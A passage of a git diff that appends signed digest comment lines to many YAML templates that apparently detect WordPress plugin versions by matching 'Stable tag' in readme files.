490a00463044022079ebf3375178607d374e2247df8ef26c0c2c6a6d02612e4bcc9402df7f5263e402207618ca2920eae376f7ec4fee4889e5bef656c2149ff657405d5b4ea8e2b0d260:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index e7db9944e4..60d49ba699 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100961fbbc3edfec446e7ec2a2ba079d54f4edf9e9b6332ab13d9503c13a80af795022100a1654564a372590e5aa8051f117bdcb9079ae88a4cb76d9f8ed8853f237d1f71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 268bd7b9df..06dd3f5ea6 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c85f7bac96dd7b1d8ad81c8d542a24e837bdee7227e89406130e272b284175a5022100c52f76fdcdd4b7d94592b214ae12910da258a6098f602b065897d415f3574b9e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index d7fb2209d1..53fa7725ba 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092ca409cc9c0883c229217dbdc30c7c5b467d0c9d3f5451a5608e219440164f30220239ee3681f07358c526f631fc558630f75382d0ed101b71a47c72d993ae8cf99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index a1641d4632..794cb52195 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210091617b19ddf960cdb3c8f16b4f238d830017f83285be4a7fa1d73d5eca0a3bb6022100b006c3b1d2fa8c8634e4fe885623dbd85360e57655e0351075301b18d2432d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 3b6542683c..c6a5a1d4c4 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008a5342be33992f83513b6f03b5ca09d7ca9b451525e30cdadebf99f93a9937ec022100d944f1bce87b3c936456508f41e3e23fcdcbfb36500f6d60f9140953e29521dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index 969c280ee1..e48c69c5a9 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022055292c449bd77a631192b9b365a0e101ac7b0e613e3e6143033b2d6e84a169e102210083ac1bf194ea8e915bde334c82b4104aa362cb78f7d9759c52f1ba2f2a823ac1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index 1c97c422e4..8231bd84d1 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204b21dfe604a1e3863ff361b9cc644fb7f41c2506082e41557d0b231b3210d3ef022032325329bf7ca42a6775929743e022fa275c59640d645aa6945629e8885d10a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 7d861cf06a..c588400fd6 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e62c4938696662ae03a6252ac3573eefbda5dd5820b24501e91bfe2b87dbda9c02210086d5b7f46992ce2913a4a0540fdf260a57cfe5144059899e218e9c4c2274efd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 00eb1e2dfc..4651f20152 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210083a73bd0e039c34fd6adb7f92a15132061c9476793b85e44b7a0c8bf19f6fff0022100db0148a1b8dcbd18f85ab7ab71d92f0518f57dd069e9fa01898d2553623fd160:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index f089ee37d3..bc046e3bfd 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef6998921a307c1d220b84bb6cb70f164e4fb92ffb20e9222a569c4d93977b2102203f9ca0cafc362146a16d883cf80b032508c4a32a8b51d62b5c254ba3cd871ef1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 492d66db68..b291d4bf84 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022033928f76a97a4d694d9c8a01121f1432ec48f11e678e423ecc619724d96751c7022100821c1a873b99026e4ef8a0ad089c61ebe389fbc7f282e8050ea20ac97ecd4a75:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index f8903fa3db..1cb693190a 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a689b7a35209f19c4ba726e2638e08dda198640ed2e3fa74277f7e696084a716022034019d6cf0169bcd4fda1bb07cde2439798885df8739c682134f5f737ec6de22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index ae2451ca38..abe2c32f55 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502203cd94fde4c95ced14d55f2d330c3d2c48a6d4c72a3878b730ae6172ec79fa9b4022100ebf5ba0a5b0d3d0e0e1f03e5bbb05c4d02375d42e4c6756ff4791901033c6f5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index dcc61d1255..4811e53103 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022028d8554f50f10132d885a4152e0e1b1528f7459fa6262bb876929ffa25e40225022100ff8a8ea25ed201cc10e4cacabaf7fe17bcfceb03c0c3b6bf11edadbb83881584:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index d1d2c1c1d0..1fc3397452 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210092c8a54c6fa393c14d39dfd539ab0a7361b922f11b04fed6e388145b5ad42d3402204ad76a014eab160cd73b5da0d5d9de456f7f3b217bbe45563e15d8da7daecb01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5f5e8afed5..e5142182d5 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207ae00806020ae5f6800518f79036ac0037d4d9a07c9433e9409269401dc31da40221008f257d08477220427fdc335715ad4e0b7544e4bfa199730e5a07c220eb119e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index d15634bb2b..2e0e18a427 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206081940d2795208ecb6a5cec6e504ebee94450164e31ceba84b82d617233e0000220036469417b079ae7ce7505a48128561497e952ac626e82e0cc134838a0004f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index 7da04be5d3..571df53464 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f76064aad753435eeb6b0c22e00ff2d21fc0a39f36e818360d30ffe7332f576b0220596edc564942dcaae53e92a62f4f7d188ec9bb5cbf3892c275aa9a152cb95b3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index a79253cec5..c87b70ac0f 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220222358d1e3c0dc1883e97a37385620784b40f0c7b7853c91f1139546fb345e9e02201b46cb1d25041e3da329015da004a298bad46ff8f3fd62b4662f6f4ad4e36bcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 77fc04a220..d353ea1cb4 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cea90510edc57328e8a5e090d8389fe5ce798b4e22ce98fe7b741cdeff1a4bd502204458b2868a38561c27290d1ba4d38f46e4b5374965fc0808caa4a9d9446c8e6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 733f9ee453..8f702f716c 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ca9defc4e78f9960c00041e723439c04d6ea4e1dbfdba3acee15529550e914150220653778a5f37fa6e256cecffddd9552fe364907d1266fab69b839504a7a4a0445:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index 0af08f0ac0..770edf6ff9 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dbf919d2783da740413ba5aabd6d1c937b25fd1ddae857973a56a912dd6118fd022100aa74936095ddb6a710d0bc75886348853561a263fcd72b925c8cc2f57cff3651:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index 1e4c77fbca..818a180009 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022001815237d92d9d95969f772ca3df80cdb0ee462abb72a625abd13269f7198c0d022100af0e5bb19d55a4108d4d3d35805cd9d476d8db74a287fe46c882bbe218c7ddf9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index 295e3fe82d..cf4c3a3ab3 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dfa9aadfb1980eece54f168c013f006868f349446e81ea9c2890300c0f6974d9022100c098e9b4bc9f5e5e6c41b43194f71320474817044fee165502dd356666bc89eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index 862f73201f..cec3e9643e 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdbce6f9d9b749b4f8ad153ffffacaa4f21950b449a841185e768e78a9cdfc64022100d5a6849109823e641d6cb311401d4146ebad58eafb9bda78401ae09ae91aca9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 711b64f9d0..dea0bc87e3 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200d860ab5bae0c4b30033f2c90c82759e25bdb22b5a2264bca5a5b95dd0c5cf8a022100ca5f30cfafd303bee9eb95d390d7c400fe90cebb88f67dd5373e3b315d85d4b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 58ddcfab78..82d1882cf8 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ef550d165759ee5048b761f21c5ed66495e5f3e4bbf48590c8205351b6a0c8c8022078bbe8022a5db68d860b2d6fdd316dd8ef738c5ad976a8f85168fca2a8ef953c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index 305d74e8ea..d2cebfc775 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e6e55a4ebb00f84c637984fb54406968d88b0cf74a6b6afac587f8c1d43226a60220041ad77b010103db6339aacef06ce1355ef1204ad67855733284654446cdad4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 668162fc4e..8990099861 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009abe1c6b11111bf36ca437a81878c0be2e3acbdf77d3effec81636d7e80b8c9d0220041e5f4a741af0bc1eac011e9159b9d70a98cec2f44ec25e38bda78480e3a53e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 2a233f389d..9de8de736d 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f533d70fdbb09250f4ba4e9b4b07acbd8e25e8733e0b261d60c0de220167668e02210092de89bddf02584b7e438a7f4c8cdbca9f3a8d50d51f4ef35ba2a23a41aaa350:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index a0d2554492..29fcc00937 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220082caa2627a1e658ca15a7e0473af612fbc75f1fab99f6261f1f76c005643e9902203f151ee793554360b3b6175020947a715140382fa33b7f77de4b7e4ee2bd0ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 4e5046273d..3b2964a6f6 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022074080838917265e564b46e7f2134fe3964fbcba58e9f8063dc0c4e601fecbbb1022100bea1996477d30ce364889a808646e57d708de2a5c232cd6aaacab58664b1d3da:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index f44cee7980..d6db95d7ae 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc2268a01812618fcae0aaf4e8b09ed7a11c0ebaf4ccae5e697f8d3710a3d10a022100ca60e815b14c93fe7dcf047c6d491690c075b838dcc0c709cff342373b7b21d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 39130db767..363e29c18f 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae6ded14f844b0a2fc51860dc3922ebc311094efaba631cd6872cca4e04bd14002202924c779a83dbe53623dd3b8a41a5fd46b715dd894942fcd90e0c11fc975039a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 39c497073c..4d382daaca 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220545378fea9fad1db006a88aa18f87995fee03de249b12cc8fa8cc144953a24220220225960699e84d8bb1304b2329c735651c1b93410dc7c00c3467bb195eae69f5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml index b848288b55..78775ca88c 100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200a70ea94d6bf2578f7e293b0cded6c533f5fa7bb5610aa90dbcb5d69d3ed122d022100b73f78d27a714eeaf29731af13525fa40ba41efdfc25bae499933b16ed78ddb1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..cc3db8a295 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220022d04daf866021a397e1cba8a8df0e2113802c6d0278f339111b4b4e8ef449a022100b493acdde901ac69a10ae355c60916cb6c6a0f8d39c6b1bce783b7b543faf9dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..f2cb4dc903 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100af2dc914a58f1b3737ae9e8f869d949871d75ed7a9810b5cba2c33d9068de1800221008c39a9b5a8d7540c87baae7e09cbb0216b7ff6c7715b6afbe0811825c9bc1776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..e2b9f88bb5 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022078f53b492dad12293f800d2318f14e249e4981bbea7dfd2c5f529236f2e9b9d0022008d83f837ec31af7d193de89b8667cdb9f55f862b7d467f3ddfff7a9ebd36d77:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..24981e8701 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a813d4e647dd4d77ff11d43a768b5c57948181ca69bed2a13550db5cc008a74e02203182a3221254f3ce49873c5bbd04b0c98ff84d4e9821fd36bf48f628a04f75a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..e1e9928d81 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210097d3b3bc4c13a0fb79d3a5f5eceaf815490f1af8a506f3c4940f1d23b9211fb902210085a9906ac4d875f5d124ccf087bb612787d2cc84a0fe342abe42c4136fdb66b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..57be92ba5c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203758c9b7a074ddbcfb092aecc8977a211464b402472520c1ddab3bee32aa0153022034f0e4d4dbec5e971a47a90faf70e20f2da06d0ac5173ad9dbd36b79ecadd936:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..2588beaa31 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022044b38d7a7cc8cff1714f48aa0d131b2b841e6eee5c7994ee75fb7179b1fd8188022032912b8f05177a8bbd3827ea2e08b154ed43fbd2d6ea41efc5e0e295b169ec71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..86a29ec1b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207b9f378b06bd4e7c217a410c65aa49f0c9dca8182660601076dcdf6c6a601713022100b375f235d2146edd8df3379eab6a455edf2ee0a7540132592589eec32700597a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..fb8759c303 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ead590bdcddc99181f41de6f79f11d4c8e3fa2efd5c478f1e5fd954bbebb3a52022100a7137aa19d11519c89b6ac5b63d4494ba0587822ca44700437fb5a23fd441237:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..06d477d58e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cd023dc3865dd6282f276879925d9b52ef6a4b83d5b2ce082d816195a46377f00220195c58304c73ff8c1777d912aec3abda12ac179af3677b451f71de5430b82dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..72f2d9232d 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100bb6e99ace0c5d7ffae0c8a3bbcfc1deea7921320c834d5809b860134874d09b50220112238f4b7729ca3504a4d1ef949884669697400f9e8535a7bf6ac88b98a58e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 